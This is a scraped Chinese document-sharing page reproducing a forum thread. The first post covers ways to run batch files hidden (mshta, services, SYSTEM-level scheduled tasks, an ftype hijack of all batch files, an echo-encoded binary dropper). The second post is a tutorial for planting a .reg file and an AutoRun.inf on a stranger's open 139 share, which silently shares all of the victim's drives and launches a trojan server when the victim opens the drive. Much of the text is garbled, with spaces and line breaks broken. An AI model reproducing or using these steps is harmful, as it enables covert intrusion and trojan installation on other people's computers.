批处理隐藏运行.docx
- 文档编号:30771882
- 上传时间:2023-08-23
- 格式:DOCX
- 页数:28
- 大小:32.77KB
批处理隐藏运行.docx
《批处理隐藏运行.docx》由会员分享,可在线阅读,更多相关《批处理隐藏运行.docx(28页珍藏版)》请在冰豆网上搜索。
批处理隐藏运行
Warning:
file()expectsparameter2tobelong,stringgivenin/home/z4cn/public_html/bbs/showthread.phponline156
读取数据请等待...z4eliteWebmasterPlace域名:
注册首页搜索帮助会员日历设置关于网页制作、网站建设、网络开发技术、网络营销与网站推广的交流论坛,有关、php、html、asp等相关内容.legaladvice,ChineseCooking,Cooking,culture,creditcardservices,creadcard,acceptcreditcards,VISA,MasterCard,AmericanExpress,Discover
z4站长技术交流论坛>服务器OS>WinNT>批处理隐藏运行的10种思路
上一主题下一主题
作者内容-第11种方法------借尸还魂
Ohcrap
游客
ID:
注册日期:
尚未注册
日均发贴:
0
发贴总数:
无
来 自:
批处理隐藏运行的10种思路繁体化简体化默认字号8pt10pt12pt25pt30pt默认颜色灰度橄榄色绿色蓝色褐色红色
1楼1.基础
HideRun.vbs
CODE:
-复制-保存-隐藏-Ascii-UnAscii-大写-小写CreateObject("WScript.Shell").Run"cmd/cD:
\test.bat",0
其中D:
\test.bat是你的批处理路径
HideRun.bat
CODE:
-复制-保存-隐藏-Ascii-UnAscii-大写-小写echoCreateObject("WScript.Shell").Run"cmd/cD:
\test.bat",0>$tmp.vbs
cscript.exe/e:
vbscript$tmp.vbs
del$tmp.vbs
这个批处理其实不能使其批处理本身隐藏,但是下面大部分隐藏调用批处理的原理和基础。
HideRun.js
CODE:
-复制-保存-隐藏-Ascii-UnAscii-大写-小写newActiveXObject('WScript.Shell').Run('cmd/cD:
\Test.bat',0);
用Javascript有什么好处呢?
js的字符串变量可以用单引号,从而方便命令行作为参数调用,而且js很好的支持多行语句用;分隔写成一行。
要注意的是:
js要区分大小写,方法必须用括号,结尾必须有分号。
所以就成了下面的命令:
CODE:
-复制-保存-隐藏-Ascii-UnAscii-大写-小写mshta"javascript:
newActiveXObject('WScript.Shell').Run('cmd/cD:
\test.bat',0);window.close()"
2.用快捷方式
如果要使一个批处理本身隐藏,可以参考附件里的一个快捷方式,修改附件中的相关路径即可隐藏启动你的批处理。
可以用vbs来建立一个.lnk,其实用批处理也行(先echo一个vbs出来)
HideRunShortcut:
CODE:
-复制-保存-隐藏-Ascii-UnAscii-大写-小写target:
%windir%\system32\mshta.exe"javascript:
newActiveXObject('WScript.Shell').Run('cmd/kD:
\test.bat',0);window.close()"
Startin:
%windir%
3.利用系统服务
可以用sc建立一个系统服务然后启动这个服务来启动批处理。
缺点是启动服务较慢,需要管理员权限
查考这个帖子,
-
asbai兄的大作,极大的方便了我们的使用。
CODE:
-复制-保存-隐藏-Ascii-UnAscii-大写-小写runassrvadd/cmdline:
"C:
\Windows\System32\cmd.exe/cD:
\test.bat"/name:
"mysrv"
netstartmysrv
4.利用at计划任务
用at可以建立一个计划任务,在不输入/interactive参数可以后台运行。
但是建使用at必须有管理员权限
CODE:
-复制-保存-隐藏-Ascii-UnAscii-大写-小写at09:
10"cmd/cD:
\Test.bat"
然后在9:
10系统就会自动后台以SYSTEM权限运行这个bat
5.利用ftype文件关联
综合上面的技术,使所有批处理都隐藏运行
CODE:
-复制-保存-隐藏-Ascii-UnAscii-大写-小写ftypebatfile=C:
\Windows\System32\mshta"javascript:
newActiveXObject('WScript.Shell').Run('cmd/c%1',0);window.close();"
大家可以讨论下下面的思路,目前没有明确的方法,但是理论上是可行的
6.rundll32
其实这个方法只是理论上估计的,这里提出来占个位置,留个记号,等待高手研究
rundll32可以调用dll里的API,如果有个dll可以隐藏run一个exe就可以实现隐藏启动批处理,呵呵。
目前我也没找到方法。
7.其他用户
Windows2k/XP支持多用户,如果能在后台登陆另一个账户的桌面然后运行一个批处理,就能完全达到隐藏的目的
8.bat2vbs
这个方法只是一个不是很成熟的思路。
查考这个帖子:
-
这使我们产生了一个想法:
把bat转换成vbs,然后vbs生成一个临时bat文件,然后WScript.Shell.Run隐藏启动这个临时bat
9..NET编译
参考这个帖子:
-
里面提到了一个.NETWarpper,我们完全可以利用系统自带的组件把bat编译到exe当中。
如果bat不涉及交互,exe自然就安静的运行了。
10.注入汇编
最后向大家推出的今天最隆重的,ASCIIAssemblyCode专家HerbertKleebauer的又一力作:
showwin.exe
CODE:
-复制-保存-隐藏-Ascii-UnAscii-大写-小写showwin.exeletyouminimize/maximize/hidethecommandwindow
withinabatchprogram(requiresW2korbetter).
Usage:
showwin.exenumber
0SW_HIDE
Hidesthewindowandactivatesanotherwindow.
1SW_SHOWNORMAL
Activatesanddisplaysawindow.Ifthewindowisminimizedormaximized,
thesystemrestoresittoitsoriginalsizeandposition.Anapplication
shouldspecifythisflagwhendisplayingthewindowforthefirsttime.
2SW_SHOWMINIMIZED
Activatesthewindowanddisplaysitasaminimizedwindow.
3SW_MAXIMIZE
Maximizesthespecifiedwindow.
3SW_SHOWMAXIMIZED
Activatesthewindowanddisplaysitasamaximizedwindow.
4SW_SHOWNOACTIVATE
Displaysawindowinitsmostrecentsizeandposition.Thisvalueis
similartoSW_SHOWNORMAL,exceptthewindowisnotactived.
5SW_SHOW
Activatesthewindowanddisplaysitinitscurrentsizeandposition.
6SW_MINIMIZE
Minimizesthespecifiedwindowandactivatesthenexttop-levelwindow
intheZorder.
7SW_SHOWMINNOACTIVE
Displaysthewindowasaminimizedwindow.Thisvalueissimilarto
SW_SHOWMINIMIZED,exceptthewindowisnotactivated.
8SW_SHOWNA
Displaysthewindowinitscurrentsizeandposition.Thisvalueis
similartoSW_SHOW,exceptthewindowisnotactivated.
9SW_RESTORE
Activatesanddisplaysthewindow.Ifthewindowisminimizedormaximized,
thesystemrestoresittoitsoriginalsizeandposition.Anapplication
shouldspecifythisflagwhenrestoringaminimizedwindow.
10SW_SHOWDEFAULT
SetstheshowstatebasedontheSW_valuespecifiedintheSTARTUPINFO
structurepassedtotheCreateProcessfunctionbytheprogramthat
startedtheapplication.
11SW_FORCEMINIMIZE
Windows2000/XP:
Minimizesawindow,evenifthethreadthatownsthe
windowisnotresponding.Thisflagshouldonlybeusedwhenminimizing
windowsfromadifferentthread.
---------------------------------------------------------------------------
Asimpleexample:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
:
-:
@echooff
echoBj@jzh`0X-`/PPPPPPa(DE(DM(DO(Dh(Ls(Lu(LX(LeZRR]EEEUYRX2Dx=>
echo0DxFP,0Xx.t0P,=XtGsB4o@$?
PIyUWwX0GwUYWv;ovBX2Gv0ExGIuht6>>
echoT}{zE~@gwkBG@OEKcUt`E}@mqqBsy?
seHBEaPhxr?
@zAB`LrPEyoDt@Cj?
>>
echopky_jN@QEKpEt@ij?
jySjN@REKpEt@jj?
jyGjN@SEKkjtlGuNw?
p@pjirz>>
echoFEvAUSQ?
_YLTQ@@?
~QCo_F~RDU@?
aU?
@MQ_AMy1GHs?
Gw`LbLK@shM`S_d>>
echobD_nsDddlTr_sPdlnTcnaTv_xP_ngD_rhDhsrT_kkDhrtT_fmDRNCTILk?
>>
echostaThg_So_rPfnqTl`qTdq_ShtpTrdqThV_Sqrm@ILm?
O?
cOKFDP?
@@?
dx>>
echoOdFUu?
N?
_B@J@?
?
KD?
HUA?
QOGB_QO?
F?
SCAQO?
UDF?
UCE?
Q_F?
DUA?
CUB?
>>
echoOFO?
FOS?
DUO?
IUO?
FOW?
RU{OWFO?
mYU?
wdsTeQs@OQ@?
QAQ?
LUA?
_F_og~>>
echoUODUO?
FOSAFOeAUOyAO_DCSHUOOQO?
OCFGuHUOGFO?
TUO?
DRTTqrQ@kcmS>>
echogFkPFUO?
ngRThVvTncmTJFvPMQDTrKDDcmqOFkkDFOSAFOeAUOyAdFFSnB>>
echosT`llTKcmTdmhTFQ@PBsdTrmnTdknTmhVTvncTwDSSOshTbnqTrrdTT~?
K>>
echo?
OGOQp?
o?
?
Gds?
wOw?
PGAtaCHQvNntQv_w?
A?
it\=upkNQD?
?
OuQsQG[i?
>>
echoRwrqosHy?
Mjmv\@IuBlpUrHdjNAslF~mH}OKT?
U?
?
PT~OL?
O?
O?
i?
COT~B>>
echoU?
OCU?
YF0x>>
>showwin.exe
del
dir
:
:
wait4seconds
ping-n4localhost>nul
:
:
hidewindow
showwin.exe0
dir/b
:
:
wait4seconds
ping-n4localhost>nul
:
:
showwindow
showwin.exe5
:
:
wait4seconds
ping-n4localhost>nul
delshowwin.exe
原帖地址在
不过我还没有测试成功。
估计是keyboardlayout和language/codepage不同造成的
.ref:
-
nircmd:
cmdow:
mandline.co.uk
帮你背单词:
【】
2007-03-2123:
17编辑引用
旅游Travel:
TravelN
Adansterdickup
游客
ID:
注册日期:
尚未注册
日均发贴:
0
发贴总数:
无
来 自:
AutoRun.inf说明(高级)繁体化简体化默认字号8pt10pt12pt25pt30pt默认颜色灰度橄榄色绿色蓝色褐色红色
2楼AutoRun.inf文件
最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中的方法,由于AutoRun.inf文件在技术中的应用还是很少见的,相应的资料也不多,有很多人对此觉得很神秘,本文试图为您解开这个迷,使您能完全的了解这个并不复杂却极其有趣的技术。
一、理论基础
经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?
光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘上的AutoRun.inf文件,另一个是操作系统本身的系统文件之一的Cdvsd.vxd。
Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,如果有的话,便开始寻找光盘根目录下的AutoRun.inf文件。
如果存在AutoRun.inf文件则执行它里面的预设程序。
AutoRun.inf不光能让光盘自动运行程序,也能让硬盘自动运行程序,方法很简单,先打开记事本,然后用鼠标右键点击该文件,在弹出菜单中选择“重命名”,将其改名为AutoRun.inf,在AutoRun.inf中键入以下内容:
[AutoRun] //表示AutoRun部分开始,必须输入
Icon=C:
\C.ico //给C盘一个个性化的盘符图标C.ico
Open=C:
\1.exe //指定要运行程序的路径和名称,在此为C盘下的1.exe
保存该文件,按F5刷新桌面,再看“我的电脑”中的该盘符(在此为C盘),你会发现它的磁盘图标变了,双击进入C盘,还会自动播放C盘下的1.exe文件!
解释一下:
“[AutoRun]”行是必须的固定格式,“Icon”行对应的是图标文件,“C:
\C.ico”为图标文件路径和文件名,你在输入时可以将它改为你的图片文件所在路径和文件名。
另外,“.ico”为图标文件的扩展名,如果你手头上没有这类文件,可以用看图软件ACDSee将其他格式的软件转换为ico格式,或者找到一个后缀名为BMP的文件,将它直接改名为ICO文件即可。
“Open”行指定要自动运行的文件及其盘符和路径。
要特别说明的是,如果你要改变的硬盘跟目录下没有自动播放文件,就应该把“OPEN”行删掉,否则就会因为找不到自动播放文件而打不开硬盘,此时只能用鼠标右键单击盘符在弹出菜单中选“打开”才行。
请大家注意:
保存的文件名必须是“AutoRun.inf”,编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。
更进一步,如果你的某个硬盘内容暂时比较固定的话,不妨用Flash做一个自动播放文件,再编上“Autorun”文件,那你就有最酷、最个性的硬盘了。
到这儿还没有完。
大家知道,在一些光盘放入后,我们在其图标上单击鼠标右键,还会产生一个具有特色的目录菜单,如果能对着我们的硬盘点击鼠标右键也产生这样的效果,那将更加的有特色。
其实,光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句:
shell\标志=显示的鼠标右键菜单中内容
shell\标志\command=要执行的文件或命令行
所以,要让硬盘具有特色的目录菜单,在AutoRun.inf文件中加入上述语句即可,示例如下:
shell\1=天若有情天亦老
shell\1\command\=notepadok.txt
保存完毕,按F5键刷新,然后用鼠标右键单击硬盘图标,在弹出菜单中会发现“天若有情天亦老”(图1),点击它,会自动打开硬盘中的“ok.txt”文件。
注意:
上面示例假设“ok.txt”文件在硬盘根目录下,notepad为系统自带的记事本程序。
如果要执行的文件为直接可执行程序,则在“command\”后直接添加该执行程序文件名即可。
图1
二、实例
下面就举个例子:
如果你扫到一台开着139共享的机器,而对方只完全共享了D盘,我们要让对方的所有驱动器都共享。
首先编辑一个注册表文件,打开记事本,键入以下内容:
REGEDIT4
'此处一定要空一行
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="C:
\\"
"Remark"=""
"Type"=dword:
00000000
"Flags"=dword:
00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:
\\"
"Remark"=""
"Type"=dword:
00000000
"Flags"=dword:
00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="E:
\\"
"Remark"=""
"Type"=dword:
00000000
"Flags"=dword:
00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
以上我只设置到E盘,如果对方有很多逻辑盘符的请自行设置。
将以上部分另存为Share.reg文件备用。
要特别注意REGEDIT4为大写且顶格书写,其后要空上一行,在最后一行记得要按一次回车键。
然后打开记事本,编制一个AutoRun.inf文件,键入以下内容:
[AutoRun]
Open=regedit/sShare.reg//加/s参数是为了导入时不会显示任何信息
保存AutoRun.inf文件。
将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下,这样对方只要双击D盘就会将Share.reg导入注册表,这样对方电脑重启后所有驱动器就会都完全共享出来。
如果想让对方中,只要在AutoRun.inf文件中,把“Open=Share.Reg”改成“Open=服务端文件名”,然后把AutoRun.inf和配置好的服务端一起复制到对方D盘的根目录下,这样不需对方运行服务端程序,而只需他双击D盘就会使运行!
这样做的好处显而易见,那就是大大的增加了运行的主动性!
须知许多人现在都是非常警惕的,不熟悉的文件他们轻易的不会运行,而这种方法就很难防范了。
禁止autorun.inf自动运行
运行"gpedit.msc",展开“计算机配置”->“管理模板”->“系统”,在右边窗口打开“关闭自动播放”,选上“已启用”,并在“关闭自动播放”
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 批处理 隐藏 运行